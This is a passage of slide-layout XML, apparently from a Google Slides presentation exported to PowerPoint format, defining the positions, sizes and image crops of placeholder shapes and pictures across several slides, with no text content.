            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="112963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967" name="Google Shape;1967;p135"/>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68" name="Google Shape;1968;p135"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4930259"/>
            <a:ext cx="1540411" cy="1190090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1969" name="Google Shape;1969;p135"/>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0" name="Google Shape;1970;p135"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="8109292"/>
            <a:ext cx="1540411" cy="1190090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1971" name="Google Shape;1971;p135"/>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2" name="Google Shape;1972;p135"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>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73"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1974" name="Google Shape;1974;p136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="33008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136"/>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76" name="Google Shape;1976;p136"/>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77" name="Google Shape;1977;p136"/>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978" name="Google Shape;1978;p13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79" name="Google Shape;1979;p136"/>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980" name="Google Shape;1980;p1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81" name="Google Shape;1981;p136"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="33990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82" name="Google Shape;1982;p136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="4877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136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="64532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136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="80294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136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="9605733"/>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136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="11182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136"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32258" y="49302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88" name="Google Shape;1988;p136"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32525" y="65064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89" name="Google Shape;1989;p136"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32658" y="80827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90" name="Google Shape;1990;p136"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="96589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91" name="Google Shape;1991;p136"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="112963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992" name="Google Shape;1992;p136"/>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93" name="Google Shape;1993;p136"/>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1994" name="Google Shape;1994;p136"/>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95" name="Google Shape;1995;p136"/>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1996" name="Google Shape;1996;p136"/>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97" name="Google Shape;1997;p136"/>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998"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1999" name="Google Shape;1999;p137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="33008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137"/>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01" name="Google Shape;2001;p137"/>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02" name="Google Shape;2002;p137"/>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003" name="Google Shape;2003;p13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04" name="Google Shape;2004;p137"/>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005" name="Google Shape;2005;p1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06" name="Google Shape;2006;p137"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="33990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07" name="Google Shape;2007;p137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="4877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137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="64532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137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="80294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37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="9605733"/>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37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="11182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37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32258" y="49302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3" name="Google Shape;2013;p137"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32525" y="65064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4" name="Google Shape;2014;p137"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32658" y="80827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5" name="Google Shape;2015;p137"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="96589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6" name="Google Shape;2016;p137"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="112963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017" name="Google Shape;2017;p137"/>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18" name="Google Shape;2018;p137"/>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19" name="Google Shape;2019;p137"/>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0" name="Google Shape;2020;p137"/>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1" name="Google Shape;2021;p137"/>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2" name="Google Shape;2022;p137"/>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23"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2024" name="Google Shape;2024;p138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="33008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138"/>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26" name="Google Shape;2026;p138"/>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27" name="Google Shape;2027;p138"/>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028" name="Google Shape;2028;p13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29" name="Google Shape;2029;p138"/>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030" name="Google Shape;2030;p1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31" name="Google Shape;2031;p138"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="33990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32" name="Google Shape;2032;p138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="4877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138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="64532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138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="80294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138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042607" y="9605733"/>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138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3042807" y="11182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138"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32258" y="49302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38" name="Google Shape;2038;p138"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32525" y="65064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39" name="Google Shape;2039;p138"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32658" y="80827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40" name="Google Shape;2040;p138"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="96589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41" name="Google Shape;2041;p138"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32325" y="112963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042" name="Google Shape;2042;p138"/>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43" name="Google Shape;2043;p138"/>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44" name="Google Shape;2044;p138"/>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45" name="Google Shape;2045;p138"/>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46" name="Google Shape;2046;p138"/>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47" name="Google Shape;2047;p138"/>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48"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2049" name="Google Shape;2049;p139"/>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139"/>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51" name="Google Shape;2051;p139"/>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52" name="Google Shape;2052;p139"/>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053" name="Google Shape;2053;p13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54" name="Google Shape;2054;p139"/>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055" name="Google Shape;2055;p1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56" name="Google Shape;2056;p139"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="31342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57" name="Google Shape;2057;p139"/>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139"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666" y="4527867"/>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59" name="Google Shape;2059;p139"/>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139"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5922933"/>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61" name="Google Shape;2061;p139"/>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139"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-666" y="73166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63" name="Google Shape;2063;p139"/>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139"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="87102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65" name="Google Shape;2065;p139"/>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139"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-133" y="10103933"/>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67" name="Google Shape;2067;p139"/>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139"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="115656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069" name="Google Shape;2069;p139"/>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0" name="Google Shape;2070;p139"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559067"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2071" name="Google Shape;2071;p139"/>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2" name="Google Shape;2072;p139"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7347100"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2073" name="Google Shape;2073;p139"/>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74" name="Google Shape;2074;p139"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1380" b="1389"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10119360"/>
            <a:ext cx="1388917" cy="1048513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2075" name="Google Shape;2075;p139"/>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76"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2077" name="Google Shape;2077;p140"/>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140"/>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79" name="Google Shape;2079;p140"/>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80" name="Google Shape;2080;p140"/>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081" name="Google Shape;2081;p14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82" name="Google Shape;2082;p140"/>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083" name="Google Shape;2083;p1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84" name="Google Shape;2084;p140"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="31342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85" name="Google Shape;2085;p140"/>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140"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666" y="4527867"/>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87" name="Google Shape;2087;p140"/>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140"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5922933"/>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89" name="Google Shape;2089;p140"/>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140"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-666" y="73166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91" name="Google Shape;2091;p140"/>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140"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="87102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93" name="Google Shape;2093;p140"/>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140"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-133" y="10103933"/>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95" name="Google Shape;2095;p140"/>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140"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="115656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097" name="Google Shape;2097;p140"/>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98" name="Google Shape;2098;p140"/>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099" name="Google Shape;2099;p140"/>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0" name="Google Shape;2100;p140"/>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1" name="Google Shape;2101;p140"/>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2" name="Google Shape;2102;p140"/>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03" name="Google Shape;2103;p140"/>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04"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2105" name="Google Shape;2105;p141"/>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141"/>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07" name="Google Shape;2107;p141"/>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108" name="Google Shape;2108;p141"/>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109" name="Google Shape;2109;p14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10" name="Google Shape;2110;p141"/>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111" name="Google Shape;2111;p1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12" name="Google Shape;2112;p141"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="31342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13" name="Google Shape;2113;p141"/>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141"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666" y="4527867"/>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15" name="Google Shape;2115;p141"/>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141"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5922933"/>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17" name="Google Shape;2117;p141"/>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141"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-666" y="73166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19" name="Google Shape;2119;p141"/>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141"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="87102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21" name="Google Shape;2121;p141"/>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141"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-133" y="10103933"/>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23" name="Google Shape;2123;p141"/>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141"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="115656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125" name="Google Shape;2125;p141"/>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26" name="Google Shape;2126;p141"/>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27" name="Google Shape;2127;p141"/>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28" name="Google Shape;2128;p141"/>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29" name="Google Shape;2129;p141"/>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0" name="Google Shape;2130;p141"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2891"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10119360"/>
            <a:ext cx="1388917" cy="1048512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2131" name="Google Shape;2131;p141"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2891"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2133" name="Google Shape;2133;p14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142"/>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35" name="Google Shape;2135;p142"/>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136" name="Google Shape;2136;p142"/>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137" name="Google Shape;2137;p14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38" name="Google Shape;2138;p142"/>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139" name="Google Shape;2139;p1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0" name="Google Shape;2140;p142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="31342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1" name="Google Shape;2141;p14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142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666" y="4527867"/>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3" name="Google Shape;2143;p14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142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5922933"/>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5" name="Google Shape;2145;p14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142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-666" y="73166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7" name="Google Shape;2147;p14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142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="87102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9" name="Google Shape;2149;p14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142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-133" y="10103933"/>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51" name="Google Shape;2151;p14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142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="115656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153" name="Google Shape;2153;p142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3124233"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2154" name="Google Shape;2154;p142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559067"/>
            <a:ext cx="1389526" cy="1056316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2155" name="Google Shape;2155;p142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5881600"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
